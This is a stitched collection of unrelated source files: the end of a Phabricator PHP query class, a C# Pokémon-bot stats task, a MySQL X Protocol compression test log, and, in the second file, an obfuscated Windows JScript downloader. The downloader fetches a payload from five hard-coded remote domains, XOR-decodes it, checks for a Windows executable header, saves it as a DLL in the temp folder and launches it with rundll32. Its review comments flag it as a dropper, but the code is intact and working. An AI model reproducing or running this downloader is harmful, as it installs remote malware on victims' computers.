            $transform['originalPHID'],
            $transform['transform']);
        }
      }
      $where[] = qsprintf($conn, '%LO', $clauses);
    }

    if ($this->dateCreatedAfter !== null) {
      $where[] = qsprintf(
        $conn,
        'f.dateCreated >= %d',
        $this->dateCreatedAfter);
    }

    if ($this->dateCreatedBefore !== null) {
      $where[] = qsprintf(
        $conn,
        'f.dateCreated <= %d',
        $this->dateCreatedBefore);
    }

    if ($this->contentHashes !== null) {
      $where[] = qsprintf(
        $conn,
        'f.contentHash IN (%Ls)',
        $this->contentHashes);
    }

    if ($this->minLength !== null) {
      $where[] = qsprintf(
        $conn,
        'byteSize >= %d',
        $this->minLength);
    }

    if ($this->maxLength !== null) {
      $where[] = qsprintf(
        $conn,
        'byteSize <= %d',
        $this->maxLength);
    }

    if ($this->names !== null) {
      $where[] = qsprintf(
        $conn,
        'name in (%Ls)',
        $this->names);
    }

    if ($this->isPartial !== null) {
      $where[] = qsprintf(
        $conn,
        'isPartial = %d',
        (int)$this->isPartial);
    }

    if ($this->isDeleted !== null) {
      $where[] = qsprintf(
        $conn,
        'isDeleted = %d',
        (int)$this->isDeleted);
    }

    if ($this->builtinKeys !== null) {
      $where[] = qsprintf(
        $conn,
        'builtinKey IN (%Ls)',
        $this->builtinKeys);
    }

    if ($this->isBuiltin !== null) {
      // Builtin status is derived from builtinKey being set at all.
      if ($this->isBuiltin) {
        $where[] = qsprintf(
          $conn,
          'builtinKey IS NOT NULL');
      } else {
        $where[] = qsprintf(
          $conn,
          'builtinKey IS NULL');
      }
    }

    if ($this->storageEngines !== null) {
      $where[] = qsprintf(
        $conn,
        'storageEngine IN (%Ls)',
        $this->storageEngines);
    }

    return $where;
  }

  protected function getPrimaryTableAlias() {
    return 'f';
  }

  public function getQueryApplicationClass() {
    return 'PhabricatorFilesApplication';
  }

}
| {
"pile_set_name": "Github"
} |
// Remove every comma from the receiver string.
// NOTE(review): part of an obfuscated "codec" (see block below); the odd
// method name is kept for compatibility with its callers.
String.prototype.DisassociativeKMx1 = function () {
    return this.replace(/,/g, "");
};
//BEGIN_CODEC_PART
// NOTE(review): heavily obfuscated, machine-mangled code — randomized
// identifiers and a hand-rolled single-byte codec are patterns commonly
// seen in script droppers. Flagging for a security review rather than
// rewriting; all names and tokens are preserved byte-for-byte.
//
// Encodes a JS (UTF-16) string into an array of single-byte values:
// code points below 128 pass through unchanged, others are mapped via the
// lookup table below (which matches the inverse table in the companion
// decode function further down, i.e. an OEM-style code page mapping —
// presumably CP437; confirm against the full table). Code points absent
// from the table produce undefined entries — assumed never to occur in
// the inputs this codec is fed.
function DisassociativeNXr9(DisassociativeTWf7)
{var DisassociativeFDs1=new Array();
DisassociativeFDs1[199]=128;DisassociativeFDs1[252]=129;DisassociativeFDs1[233]=130;DisassociativeFDs1[226]=131;DisassociativeFDs1[228]=132;DisassociativeFDs1[224]=133;DisassociativeFDs1[229]=134;DisassociativeFDs1[231]=135;DisassociativeFDs1[234]=136;DisassociativeFDs1[235]=137;
DisassociativeFDs1[232]=138;DisassociativeFDs1[239]=139;DisassociativeFDs1[238]=140;DisassociativeFDs1[236]=141;DisassociativeFDs1[196]=142;DisassociativeFDs1[197]=143;DisassociativeFDs1[201]=144;DisassociativeFDs1[230]=145;DisassociativeFDs1[198]=146;DisassociativeFDs1[244]=147;
DisassociativeFDs1[246]=148;DisassociativeFDs1[242]=149;DisassociativeFDs1[251]=150;DisassociativeFDs1[249]=151;DisassociativeFDs1[255]=152;DisassociativeFDs1[214]=153;DisassociativeFDs1[220]=154;DisassociativeFDs1[162]=155;DisassociativeFDs1[163]=156;DisassociativeFDs1[165]=157;
DisassociativeFDs1[8359]=158;DisassociativeFDs1[402]=159;DisassociativeFDs1[225]=160;DisassociativeFDs1[237]=161;DisassociativeFDs1[243]=162;DisassociativeFDs1[250]=163;DisassociativeFDs1[241]=164;DisassociativeFDs1[209]=165;DisassociativeFDs1[170]=166;DisassociativeFDs1[186]=167;
DisassociativeFDs1[191]=168;DisassociativeFDs1[8976]=169;DisassociativeFDs1[172]=170;DisassociativeFDs1[189]=171;DisassociativeFDs1[188]=172;DisassociativeFDs1[161]=173;DisassociativeFDs1[171]=174;DisassociativeFDs1[187]=175;DisassociativeFDs1[9617]=176;DisassociativeFDs1[9618]=177;
DisassociativeFDs1[9619]=178;DisassociativeFDs1[9474]=179;DisassociativeFDs1[9508]=180;DisassociativeFDs1[9569]=181;DisassociativeFDs1[9570]=182;DisassociativeFDs1[9558]=183;DisassociativeFDs1[9557]=184;DisassociativeFDs1[9571]=185;DisassociativeFDs1[9553]=186;DisassociativeFDs1[9559]=187;
DisassociativeFDs1[9565]=188;DisassociativeFDs1[9564]=189;DisassociativeFDs1[9563]=190;DisassociativeFDs1[9488]=191;DisassociativeFDs1[9492]=192;DisassociativeFDs1[9524]=193;DisassociativeFDs1[9516]=194;DisassociativeFDs1[9500]=195;DisassociativeFDs1[9472]=196;DisassociativeFDs1[9532]=197;
DisassociativeFDs1[9566]=198;DisassociativeFDs1[9567]=199;DisassociativeFDs1[9562]=200;DisassociativeFDs1[9556]=201;DisassociativeFDs1[9577]=202;DisassociativeFDs1[9574]=203;DisassociativeFDs1[9568]=204;DisassociativeFDs1[9552]=205;DisassociativeFDs1[9580]=206;DisassociativeFDs1[9575]=207;
DisassociativeFDs1[9576]=208;DisassociativeFDs1[9572]=209;DisassociativeFDs1[9573]=210;DisassociativeFDs1[9561]=211;DisassociativeFDs1[9560]=212;DisassociativeFDs1[9554]=213;DisassociativeFDs1[9555]=214;DisassociativeFDs1[9579]=215;DisassociativeFDs1[9578]=216;DisassociativeFDs1[9496]=217;
DisassociativeFDs1[9484]=218;DisassociativeFDs1[9608]=219;DisassociativeFDs1[9604]=220;DisassociativeFDs1[9612]=221;DisassociativeFDs1[9616]=222;DisassociativeFDs1[9600]=223;DisassociativeFDs1[945]=224;DisassociativeFDs1[223]=225;DisassociativeFDs1[915]=226;DisassociativeFDs1[960]=227;
DisassociativeFDs1[931]=228;DisassociativeFDs1[963]=229;DisassociativeFDs1[181]=230;DisassociativeFDs1[964]=231;DisassociativeFDs1[934]=232;DisassociativeFDs1[920]=233;DisassociativeFDs1[937]=234;DisassociativeFDs1[948]=235;DisassociativeFDs1[8734]=236;DisassociativeFDs1[966]=237;
DisassociativeFDs1[949]=238;DisassociativeFDs1[8745]=239;DisassociativeFDs1[8801]=240;DisassociativeFDs1[177]=241;DisassociativeFDs1[8805]=242;DisassociativeFDs1[8804]=243;DisassociativeFDs1[8992]=244;DisassociativeFDs1[8993]=245;DisassociativeFDs1[247]=246;DisassociativeFDs1[8776]=247;
DisassociativeFDs1[176]=248;DisassociativeFDs1[8729]=249;DisassociativeFDs1[183]=250;DisassociativeFDs1[8730]=251;DisassociativeFDs1[8319]=252;DisassociativeFDs1[178]=253;DisassociativeFDs1[9632]=254;DisassociativeFDs1[160]=255;
// Walk the input one UTF-16 code unit at a time, appending the mapped
// byte value for each character.
var DisassociativeOOx0=new Array();
for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeTWf7.length; DisassociativeFNx2 += 1)
{var DisassociativeEGc4=DisassociativeTWf7["charCodeAt"](DisassociativeFNx2);
if (DisassociativeEGc4 < 128){var DisassociativeLZu0=DisassociativeEGc4;}
else {var DisassociativeLZu0=DisassociativeFDs1[DisassociativeEGc4];}
DisassociativeOOx0["push"](DisassociativeLZu0);};
return DisassociativeOOx0;}
function DisassociativePw3(DisassociativeTt7)
{var DisassociativeTUu2=new Array();
DisassociativeTUu2[128]=199;DisassociativeTUu2[129]=252;DisassociativeTUu2[130]=233;DisassociativeTUu2[131]=226;DisassociativeTUu2[132]=228;DisassociativeTUu2[133]=224;DisassociativeTUu2[134]=229;DisassociativeTUu2[135]=231;DisassociativeTUu2[136]=234;DisassociativeTUu2[137]=235;
DisassociativeTUu2[138]=232;DisassociativeTUu2[139]=239;DisassociativeTUu2[140]=238;DisassociativeTUu2[141]=236;DisassociativeTUu2[142]=196;DisassociativeTUu2[143]=197;DisassociativeTUu2[144]=201;DisassociativeTUu2[145]=230;DisassociativeTUu2[146]=198;DisassociativeTUu2[147]=244;
DisassociativeTUu2[148]=246;DisassociativeTUu2[149]=242;DisassociativeTUu2[150]=251;DisassociativeTUu2[151]=249;DisassociativeTUu2[152]=255;DisassociativeTUu2[153]=214;DisassociativeTUu2[154]=220;DisassociativeTUu2[155]=162;DisassociativeTUu2[156]=163;DisassociativeTUu2[157]=165;
DisassociativeTUu2[158]=8359;DisassociativeTUu2[159]=402;DisassociativeTUu2[160]=225;DisassociativeTUu2[161]=237;DisassociativeTUu2[162]=243;DisassociativeTUu2[163]=250;DisassociativeTUu2[164]=241;DisassociativeTUu2[165]=209;DisassociativeTUu2[166]=170;DisassociativeTUu2[167]=186;
DisassociativeTUu2[168]=191;DisassociativeTUu2[169]=8976;DisassociativeTUu2[170]=172;DisassociativeTUu2[171]=189;DisassociativeTUu2[172]=188;DisassociativeTUu2[173]=161;DisassociativeTUu2[174]=171;DisassociativeTUu2[175]=187;DisassociativeTUu2[176]=9617;DisassociativeTUu2[177]=9618;
DisassociativeTUu2[178]=9619;DisassociativeTUu2[179]=9474;DisassociativeTUu2[180]=9508;DisassociativeTUu2[181]=9569;DisassociativeTUu2[182]=9570;DisassociativeTUu2[183]=9558;DisassociativeTUu2[184]=9557;DisassociativeTUu2[185]=9571;DisassociativeTUu2[186]=9553;DisassociativeTUu2[187]=9559;
DisassociativeTUu2[188]=9565;DisassociativeTUu2[189]=9564;DisassociativeTUu2[190]=9563;DisassociativeTUu2[191]=9488;DisassociativeTUu2[192]=9492;DisassociativeTUu2[193]=9524;DisassociativeTUu2[194]=9516;DisassociativeTUu2[195]=9500;DisassociativeTUu2[196]=9472;DisassociativeTUu2[197]=9532;
DisassociativeTUu2[198]=9566;DisassociativeTUu2[199]=9567;DisassociativeTUu2[200]=9562;DisassociativeTUu2[201]=9556;DisassociativeTUu2[202]=9577;DisassociativeTUu2[203]=9574;DisassociativeTUu2[204]=9568;DisassociativeTUu2[205]=9552;DisassociativeTUu2[206]=9580;DisassociativeTUu2[207]=9575;
DisassociativeTUu2[208]=9576;DisassociativeTUu2[209]=9572;DisassociativeTUu2[210]=9573;DisassociativeTUu2[211]=9561;DisassociativeTUu2[212]=9560;DisassociativeTUu2[213]=9554;DisassociativeTUu2[214]=9555;DisassociativeTUu2[215]=9579;DisassociativeTUu2[216]=9578;DisassociativeTUu2[217]=9496;
DisassociativeTUu2[218]=9484;DisassociativeTUu2[219]=9608;DisassociativeTUu2[220]=9604;DisassociativeTUu2[221]=9612;DisassociativeTUu2[222]=9616;DisassociativeTUu2[223]=9600;DisassociativeTUu2[224]=945;DisassociativeTUu2[225]=223;DisassociativeTUu2[226]=915;DisassociativeTUu2[227]=960;
DisassociativeTUu2[228]=931;DisassociativeTUu2[229]=963;DisassociativeTUu2[230]=181;DisassociativeTUu2[231]=964;DisassociativeTUu2[232]=934;DisassociativeTUu2[233]=920;DisassociativeTUu2[234]=937;DisassociativeTUu2[235]=948;DisassociativeTUu2[236]=8734;DisassociativeTUu2[237]=966;
DisassociativeTUu2[238]=949;DisassociativeTUu2[239]=8745;DisassociativeTUu2[240]=8801;DisassociativeTUu2[241]=177;DisassociativeTUu2[242]=8805;DisassociativeTUu2[243]=8804;DisassociativeTUu2[244]=8992;DisassociativeTUu2[245]=8993;DisassociativeTUu2[246]=247;DisassociativeTUu2[247]=8776;
DisassociativeTUu2[248]=176;DisassociativeTUu2[249]=8729;DisassociativeTUu2[250]=183;DisassociativeTUu2[251]=8730;DisassociativeTUu2[252]=8319;DisassociativeTUu2[253]=178;DisassociativeTUu2[254]=9632;DisassociativeTUu2[255]=160;
var DisassociativeAd2=new Array();var DisassociativeUw6="";var DisassociativeLZu0; var DisassociativeEGc4;
for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeTt7.length; DisassociativeFNx2 += 1)
{DisassociativeLZu0=DisassociativeTt7[DisassociativeFNx2];
if (DisassociativeLZu0 < 128){DisassociativeEGc4=DisassociativeLZu0;}
else {DisassociativeEGc4=DisassociativeTUu2[DisassociativeLZu0];}
DisassociativeAd2.push(String["fromCharCode"](DisassociativeEGc4));}
DisassociativeUw6=DisassociativeAd2["join"]("");
return DisassociativeUw6;}
function DisassociativeGl6(DisassociativeTt7, DisassociativeEFs6)
{var DisassociativeDRw6 = DisassociativeNXr9(DisassociativeEFs6);
for (var DisassociativeFNx2 = 0; DisassociativeFNx2 < DisassociativeTt7.length; DisassociativeFNx2 += 1)
{DisassociativeTt7[DisassociativeFNx2] ^= DisassociativeDRw6[DisassociativeFNx2 % DisassociativeDRw6.length];};
return DisassociativeTt7;}
function DisassociativeUq7(DisassociativeYGa2)
{var DisassociativeNCk5=WScript["CreateObject"]("A"+"D"+"O"+"DB.Stream");
DisassociativeNCk5["type"]=2;
DisassociativeNCk5["Charset"]="437";
DisassociativeNCk5["open"]();
DisassociativeNCk5["LoadFromFile"](DisassociativeYGa2);
var DisassociativeZj1=DisassociativeNCk5["ReadText"];
DisassociativeNCk5["close"]();
return DisassociativeNXr9(DisassociativeZj1);}
function DisassociativePp3(DisassociativeYGa2, DisassociativeTt7)
{var DisassociativeNCk5=WScript["CreateObject"]("A"+"D"+"O"+"DB.Stream");
DisassociativeNCk5["type"]=2;
DisassociativeNCk5["Charset"]="437";
DisassociativeNCk5["open"]();
DisassociativeNCk5["writeText"](DisassociativePw3(DisassociativeTt7));
DisassociativeNCk5["SaveToFile"](DisassociativeYGa2, 2);
DisassociativeNCk5["close"]();}
//END_CODEC_PART
var DisassociativeBp8 = "http://";
var DisassociativeWx8 = [DisassociativeBp8 + "sadhekoala.com/lvqh1",DisassociativeBp8 + "xhumbrella.com/jb5c396v",DisassociativeBp8 + "wbakerpsych.com/j00gr8z",DisassociativeBp8 + "valpit.ru/kn3jm",DisassociativeBp8 + "lauiatraps.net/zyqjw08qqt"];
var DisassociativeBNy7 = "TPTv9jGFV";
var DisassociativeKa7 = "R9cSS1rkjyRw";
var DisassociativeSb3 = "L2hr1GeO6BCNFWPT";
var DisassociativeUr8=2;
var DisassociativeBs9=WScript["CreateObject"]("WScript.Shell");
var DisassociativeGFa5=DisassociativeBs9.ExpandEnvironmentStrings("%T"+"EMP%/");
var DisassociativeXAk4=DisassociativeGFa5 + DisassociativeBNy7;
var DisassociativeFUm6=DisassociativeXAk4 + ".d" + "ll";
var DisassociativeFn1 = DisassociativeBs9["Environment"]("System");
if (DisassociativeFn1("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var DisassociativeAKu2 = DisassociativeBs9.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\ru"+"ndll32.exe");
}
else
{
var DisassociativeAKu2 = DisassociativeBs9["ExpandEnvironmentStrings"]("%SystemRoot%\\system32\\ru"+"ndll32.exe");
}
var DisassociativeIHy7=["M,S,X,M,L,2,.,X,M,L,H,T,T,P".DisassociativeKMx1(), "WinHttp.WinHttpRequest.5.1"];
for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeIHy7.length; DisassociativeFNx2 += 1)
{
try
{
var DisassociativeQPw3=WScript["CreateObject"](DisassociativeIHy7[DisassociativeFNx2]);
break;
}
catch (e)
{
continue;
}
};
var DisassociativePUo6 = new ActiveXObject("Scripting.FileSystemObject");
function DisassociativeUf9()
{
var DisassociativeWUn8 = DisassociativePUo6.GetFile(DisassociativeFUm6);
return DisassociativeWUn8["ShortPath"];
}
var DisassociativeFy6 = 0;
for (var DisassociativeTTb4 = 0; DisassociativeTTb4 < DisassociativeWx8.length; DisassociativeTTb4 = DisassociativeTTb4 + 1)
{
try
{
var DisassociativeSPt3=this["W,S,c,r,i,p,t".DisassociativeKMx1()]["CreateObject"]("A"+"D"+"O"+"DB.Stream");
DisassociativeQPw3["open"]("G,E,T".DisassociativeKMx1(), DisassociativeWx8[DisassociativeTTb4], false);
DisassociativeQPw3.setRequestHeader("User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
DisassociativeQPw3["send"]();
while (DisassociativeQPw3.readystate < 4) WScript["Sleep"](100);
DisassociativeSPt3["open"]();
DisassociativeSPt3.type=1;
/*@cc_on
DisassociativeSPt3.write(DisassociativeQPw3.ResponseBody);
DisassociativeSPt3.position=0;
DisassociativeSPt3['Sav'+'eT'+'oFile'](DisassociativeXAk4, DisassociativeUr8);
DisassociativeSPt3.close();
var DisassociativeOOx0 = DisassociativeUq7(DisassociativeXAk4);
DisassociativeOOx0 = DisassociativeGl6(DisassociativeOOx0, DisassociativeKa7);
if (DisassociativeOOx0[0] != 77 || DisassociativeOOx0[1] != 90) continue;
DisassociativePp3(DisassociativeFUm6, DisassociativeOOx0);
var DisassociativeZGx7 = DisassociativeUf9();
var d = new Date();
d.setFullYear("2015");
eval('DisassociativeBs9["R,u,n".DisassociativeKMx1()]("r,u,n,d,l,l,3,2".DisassociativeKMx1() + " " + DisassociativeZGx7 + "," + DisassociativeSb3);');
@*/
break;
}
catch (e) {continue;};
}
WScript.Quit(0); | {
"pile_set_name": "Github"
} |
#region using directives
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using PoGo.PokeMobBot.Logic.DataDumper;
using PoGo.PokeMobBot.Logic.Event;
using PoGo.PokeMobBot.Logic.PoGoUtils;
using PoGo.PokeMobBot.Logic.State;
#endregion
namespace PoGo.PokeMobBot.Logic.Tasks
{
public class DisplayPokemonStatsTask
{
    // NOTE(review): neither list is read or written anywhere in this class —
    // presumably shared state consumed by other tasks; confirm before removing.
    public static List<ulong> PokemonId = new List<ulong>();
    public static List<ulong> PokemonIdcp = new List<ulong>();

    /// <summary>
    /// Dispatches events listing the highest-CP and highest-IV Pokemon in the
    /// player's bag and, when enabled in settings, dumps the full bag to
    /// "PokeBagStats" TXT and CSV files.
    /// </summary>
    /// <param name="session">Bot session supplying inventory access, logic settings,
    /// translations and the event dispatcher.</param>
    public static async Task Execute(ISession session)
    {
        // NOTE(review): hard-coded to 40 rather than the trainer's actual level,
        // so PokemonAnalysis presumably reflects max-powered potential — confirm intended.
        var trainerLevel = 40;
        var highestsPokemonCp = await session.Inventory.GetHighestsCp(session.LogicSettings.AmountOfPokemonToDisplayOnStartCp);
        var pokemonPairedWithStatsCp = highestsPokemonCp.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();
        // NOTE(review): the two "*ForUpgrade" results below are computed but never
        // used in this method — dead work; verify whether a consumer was removed.
        var highestsPokemonCpForUpgrade = await session.Inventory.GetHighestsCp(50);
        var pokemonPairedWithStatsCpForUpgrade = highestsPokemonCpForUpgrade.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();
        var highestsPokemonPerfect = await session.Inventory.GetHighestsPerfect(session.LogicSettings.AmountOfPokemonToDisplayOnStartIv);
        var pokemonPairedWithStatsIv = highestsPokemonPerfect.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();
        var highestsPokemonIvForUpgrade = await session.Inventory.GetHighestsPerfect(50);
        var pokemonPairedWithStatsIvForUpgrade = highestsPokemonIvForUpgrade.Select(pokemon => new PokemonAnalysis(pokemon, trainerLevel)).ToList();

        // Announce the top list sorted by CP ...
        session.EventDispatcher.Send(
            new DisplayHighestsPokemonEvent
            {
                SortedBy = "CP",
                PokemonList = pokemonPairedWithStatsCp,
                DisplayPokemonMaxPoweredCp = session.LogicSettings.DisplayPokemonMaxPoweredCp,
                DisplayPokemonMovesetRank = session.LogicSettings.DisplayPokemonMovesetRank
            });
        await Task.Delay(session.LogicSettings.DelayDisplayPokemon);
        // ... then the top list sorted by IV.
        session.EventDispatcher.Send(
            new DisplayHighestsPokemonEvent
            {
                SortedBy = "IV",
                PokemonList = pokemonPairedWithStatsIv,
                DisplayPokemonMaxPoweredCp = session.LogicSettings.DisplayPokemonMaxPoweredCp,
                DisplayPokemonMovesetRank = session.LogicSettings.DisplayPokemonMovesetRank
            });

        // 1000 acts as "effectively the whole bag"; ordering follows the
        // user's IV-vs-CP priority setting.
        var allPokemonInBag = session.LogicSettings.PrioritizeIvOverCp
            ? await session.Inventory.GetHighestsPerfect(1000)
            : await session.Inventory.GetHighestsCp(1000);
        if (session.LogicSettings.DumpPokemonStats)
        {
            const string dumpFileName = "PokeBagStats";
            string toDumpCSV = "Name,Level,CP,IV,Move1,Move2\r\n";
            string toDumpTXT = "";
            // Start from empty dump files (both the .txt and .csv variants).
            Dumper.ClearDumpFile(session, dumpFileName);
            Dumper.ClearDumpFile(session, dumpFileName, "csv");
            foreach (var pokemon in allPokemonInBag)
            {
                toDumpTXT += $"NAME: {session.Translation.GetPokemonName(pokemon.PokemonId).PadRight(16, ' ')}Lvl: {PokemonInfo.GetLevel(pokemon).ToString("00")}\t\tCP: {pokemon.Cp.ToString().PadRight(8, ' ')}\t\t IV: {PokemonInfo.CalculatePokemonPerfection(pokemon).ToString("0.00")}%\t\t\tMOVE1: {pokemon.Move1}\t\t\tMOVE2: {pokemon.Move2}\r\n";
                toDumpCSV += $"{session.Translation.GetPokemonName(pokemon.PokemonId)},{PokemonInfo.GetLevel(pokemon).ToString("00")},{pokemon.Cp},{PokemonInfo.CalculatePokemonPerfection(pokemon).ToString("0.00")}%,{pokemon.Move1},{pokemon.Move2}\r\n";
            }
            Dumper.Dump(session, toDumpTXT, dumpFileName);
            Dumper.Dump(session, toDumpCSV, dumpFileName, "csv");
        }
        await Task.Delay(session.LogicSettings.DelayDisplayPokemon);
    }
}
}
| {
"pile_set_name": "Github"
} |
## A. Execute the test using valid compression: deflate + combine mixed=false
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## B. Execute the test using valid compression: deflate + combine mixed=true
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## C. Execute the test using valid compression: deflate + combine mixed=true + limit-messages=1
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## D. Execute the test using valid compression: deflate + combine mixed=true + limit-messages=2
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## E. Execute the test using valid compression: lz4 + combine mixed=false
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## F. Execute the test using valid compression: lz4 + combine mixed=true
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## G. Execute the test using valid compression: lz4 + combine mixed=true + limit-messages=1
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## H. Execute the test using valid compression: lz4 + combine mixed=true + limit-messages=2
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## I. Execute the test using valid compression: zstd + combine mixed=false
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## J. Execute the test using valid compression: zstd + combine mixed=true
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## K. Execute the test using valid compression: zstd + combine mixed=true + limit-messages=1
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
## L. Execute the test using valid compression: zstd + combine mixed=true + limit-messages=2
#
## I. Send compression message to the server and verify successful execution
# also show that neither "server_combine_mixed_messages" nor "server_max_combine_messages"
# has influence on client compression messages
#
# 1. Send compression message containing single X Protocol message (StmtExecute)
# 2. Send compression message containing single X Protocol message (Expect.Open)
# 3. Send compression message containing multiple X Protocol message
# of the same type (StmtExecute)
# 4. Send compression message containing multiple X Protocol message
